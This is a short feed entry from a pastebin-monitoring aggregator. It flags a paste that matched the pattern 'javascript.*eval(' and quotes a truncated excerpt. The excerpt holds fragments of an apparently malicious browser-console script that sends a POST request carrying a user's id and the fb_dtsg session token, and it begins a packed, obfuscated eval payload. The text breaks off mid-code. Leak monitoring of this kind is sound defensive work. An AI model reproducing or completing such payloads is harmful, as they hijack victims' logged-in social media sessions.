Quantcast
Channel: pastebin.com – LeakedIn
Viewing all articles
Browse latest Browse all 2834

Potential leak of data: Obfuscated JavaScript Code

$
0
0
Detected 1 occurrence(s) of ‘javascript.*eval\(‘: user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp="; X.open("POST", XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); } javascript: eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[ Source: http://pastebin.com/raw.php?i=SPxW0WPE

Viewing all articles
Browse latest Browse all 2834

Trending Articles